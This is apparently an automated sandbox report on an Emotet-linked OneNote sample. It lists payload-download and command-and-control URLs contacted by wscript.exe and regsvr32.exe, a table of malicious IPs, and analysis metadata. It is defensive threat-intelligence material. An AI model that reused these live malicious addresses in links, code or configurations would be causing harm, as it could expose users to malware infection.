                https://164.90.222.65/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/regsvr32.exe, 00000004.00000002.633026699.000000000306E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://160.16.142.56:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/;regsvr32.exe, 00000004.00000002.632757041.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://169.89.202.34/regsvr32.exe, 00000004.00000002.632757041.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://91.121.146.47:8080/regsvr32.exe, 00000004.00000002.632695477.0000000000EAD000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://187.172.199.165:8080/regsvr32.exe, 00000004.00000003.532536452.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://163.44.196.120:8080/regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Z=regsvr32.exe, 00000004.00000003.532419572.000000000306E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://66.228.32.31:7080/Qregsvr32.exe, 00000004.00000003.504544238.0000000000F1F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://www.gomespontes.com.br/logs/pd/vMwscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://91.121.146.47:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/regsvr32.exe, 00000004.00000002.632695477.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.480984272.0000000000F00000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://www.gomespontes.com.br/logs/pd/0wscript.exe, 00000001.00000003.397549848.000000000514E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398347187.000000000515E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396362183.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397096568.0000000005128000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396772496.0000000005110000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397979888.0000000005155000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://160.16.142.56:8080/uregsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://167.172.199.165:8080/regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://159.89.202.34/qregsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://66.228.32.31:7080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/regsvr32.exe, 00000004.00000003.532419572.000000000306E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://ozmeydan.com/cekici/9/wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/X&regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://penshorn.org/wscript.exe, 00000001.00000003.400714303.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399676570.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402484207.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.388435082.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404747809.0000000005290000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wMwscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://www.gomespontes.com.br/logs/pd/wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://penshorn.org/admin/Ses8712iGR8du/tMwscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://160.16.142.56:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/regsvr32.exe, 00000004.00000002.633026699.000000000307F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633026699.000000000306E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632757041.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0wscript.exe, 00000001.00000003.400124856.000000000122C000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uMwscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://164.90.222.65:443/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/?regsvr32.exe, 00000004.00000002.633026699.000000000307F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://187.63.160.88:80/regsvr32.exe, 00000004.00000003.532536452.0000000000EDC000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://104.168.155.143:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633026699.000000000306E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://softwareulike.com/cWIYxWMPkK/yMwscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://163.44.196.120:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://penshorn.org/admin/Ses8712iGR8du/Rwscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.392115662.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391750338.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402096163.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404247402.0000000004DEB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://91.121.146.47:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/0regsvr32.exe, 00000004.00000002.632695477.0000000000E8A000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllBwscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398560196.0000000004FEC000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://912.162.143.56/regsvr32.exe, 00000004.00000003.504424434.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		low
                https://167.172.199.165:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/regsvr32.exe, 00000004.00000002.633026699.000000000307F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.532419572.000000000307F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://104.168.155.143:8080/(SIregsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://ozmeydan.com/cekici/9/xMwscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://penshorn.org/admin/Ses8712iGR8du/cw3wscript.exe, 00000001.00000003.398804343.0000000005194000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404417697.000000000519E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399230636.0000000005194000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399258764.0000000005196000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389687687.0000000005193000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hwscript.exe, 00000001.00000002.404406526.0000000005194000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zMwscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://160.16.142.56:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/bregsvr32.exe, 00000004.00000002.633026699.000000000306E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/D=regsvr32.exe, 00000004.00000003.532419572.000000000306E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://160.16.142.56:8080/regsvr32.exe, 00000004.00000002.632757041.0000000000ED7000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://penshorn.org:443/admin/Ses8712iGR8du/wscript.exe, 00000001.00000002.404454942.00000000051DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399363691.00000000051DC000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://164.90.222.65/0regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://159.89.202.34/wnregsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://187.63.160.88:80/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/regsvr32.exe, 00000004.00000003.532536452.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.532419572.000000000307F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633026699.000000000306E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.532419572.000000000306E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                110.232.117.186
                		unknownAustralia
                		56038RACKCORP-APRackCorpAUtrue
                103.132.242.26
                		unknownIndia
                		45117INPL-IN-APIshansNetworkINtrue
                104.168.155.143
                		unknownUnited States
                		54290HOSTWINDSUStrue
                79.137.35.198
                		unknownFrance
                		16276OVHFRtrue
                115.68.227.76
                		unknownKorea Republic of
                		38700SMILESERV-AS-KRSMILESERVKRtrue
                163.44.196.120
                		unknownSingapore
                		135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGtrue
                206.189.28.199
                		unknownUnited States
                		14061DIGITALOCEAN-ASNUStrue
                203.26.41.131
                		penshorn.orgAustralia
                		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                107.170.39.149
                		unknownUnited States
                		14061DIGITALOCEAN-ASNUStrue
                66.228.32.31
                		unknownUnited States
                		63949LINODE-APLinodeLLCUStrue
                197.242.150.244
                		unknownSouth Africa
                		37611AfrihostZAtrue
                185.4.135.165
                		unknownGreece
                		199246TOPHOSTGRtrue
                183.111.227.137
                		unknownKorea Republic of
                		4766KIXS-AS-KRKoreaTelecomKRtrue
                45.176.232.124
                		unknownColombia
                		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                169.57.156.166
                		unknownUnited States
                		36351SOFTLAYERUStrue
                164.68.99.3
                		unknownGermany
                		51167CONTABODEtrue
                139.59.126.41
                		unknownSingapore
                		14061DIGITALOCEAN-ASNUStrue
                167.172.253.162
                		unknownUnited States
                		14061DIGITALOCEAN-ASNUStrue
                167.172.199.165
                		unknownUnited States
                		14061DIGITALOCEAN-ASNUStrue
                202.129.205.3
                		unknownThailand
                		45328NIPA-AS-THNIPATECHNOLOGYCOLTDTHtrue
                147.139.166.154
                		unknownUnited States
                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                153.92.5.27
                		unknownGermany
                		47583AS-HOSTINGERLTtrue
                159.65.88.10
                		unknownUnited States
                		14061DIGITALOCEAN-ASNUStrue
                172.105.226.75
                		unknownUnited States
                		63949LINODE-APLinodeLLCUStrue
                164.90.222.65
                		unknownUnited States
                		14061DIGITALOCEAN-ASNUStrue
                213.239.212.5
                		unknownGermany
                		24940HETZNER-ASDEtrue
                5.135.159.50
                		unknownFrance
                		16276OVHFRtrue
                186.194.240.217
                		unknownBrazil
                		262733NetceteraTelecomunicacoesLtdaBRtrue
                119.59.103.152
                		unknownThailand
                		56067METRABYTE-TH453LadplacoutJorakhaebuaTHtrue
                159.89.202.34
                		unknownUnited States
                		14061DIGITALOCEAN-ASNUStrue
                91.121.146.47
                		unknownFrance
                		16276OVHFRtrue
                160.16.142.56
                		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                201.94.166.162
                		unknownBrazil
                		28573CLAROSABRtrue
                91.207.28.33
                		unknownKyrgyzstan
                		39819PROHOSTKGtrue
                103.75.201.2
                		unknownThailand
                		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                103.43.75.120
                		unknownJapan20473AS-CHOOPAUStrue
                188.44.20.25
                		unknownMacedonia
                		57374GIV-ASMKtrue
                45.235.8.30
                		unknownBrazil
                		267405WIKINETTELECOMUNICACOESBRtrue
                153.126.146.25
                		unknownJapan7684SAKURA-ASAKURAInternetIncJPtrue
                72.15.201.15
                		unknownUnited States
                		13649ASN-VINSUStrue
                187.63.160.88
                		unknownBrazil
                		28169BITCOMPROVEDORDESERVICOSDEINTERNETLTDABRtrue
                82.223.21.224
                		unknownSpain
                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                173.212.193.249
                		unknownGermany
                		51167CONTABODEtrue
                95.217.221.146
                		unknownGermany
                		24940HETZNER-ASDEtrue
                149.56.131.28
                		unknownCanada
                		16276OVHFRtrue
                182.162.143.56
                		unknownKorea Republic of
                		3786LGDACOMLGDACOMCorporationKRtrue
                1.234.2.232
                		unknownKorea Republic of
                		9318SKB-ASSKBroadbandCoLtdKRtrue
                129.232.188.93
                		unknownSouth Africa
                		37153xneeloZAtrue
                94.23.45.86
                		unknownFrance
                		16276OVHFRtrue

                General Information

                Joe Sandbox Version:37.0.0 Beryl
                Analysis ID:828486
                Start date and time:2023-03-17 09:04:56 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 9m 29s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:10
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample file name:OMICS.one
                Detection:MAL
                Classification:mal100.troj.expl.evad.winONE@9/11@1/49
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 50.2% (good quality ratio 42.4%)
                • Quality average: 60.5%
                • Quality standard deviation: 35.6%
                HCA Information:
                • Successful, ratio: 88%
                • Number of executed functions: 19
                • Number of non-executed functions: 136
                Cookbook Comments:
                • Found application associated with file extension: .one

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                • Excluded IPs from analysis (whitelisted): 209.197.3.8
                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                09:06:37API Interceptor2x Sleep call for process: wscript.exe modified
                09:07:14API Interceptor10x Sleep call for process: regsvr32.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                110.232.117.186OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                  OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                    OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                      Opast_International.oneGet hashmaliciousEmotetBrowse
                        opastonline.com.oneGet hashmaliciousEmotetBrowse
                          Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                            Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                              omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                  2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                    report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                      100935929722734787.oneGet hashmaliciousEmotetBrowse
                                        NG7553084292252526_202303161746.oneGet hashmaliciousEmotetBrowse
                                          2023-03-16_1753.oneGet hashmaliciousEmotetBrowse
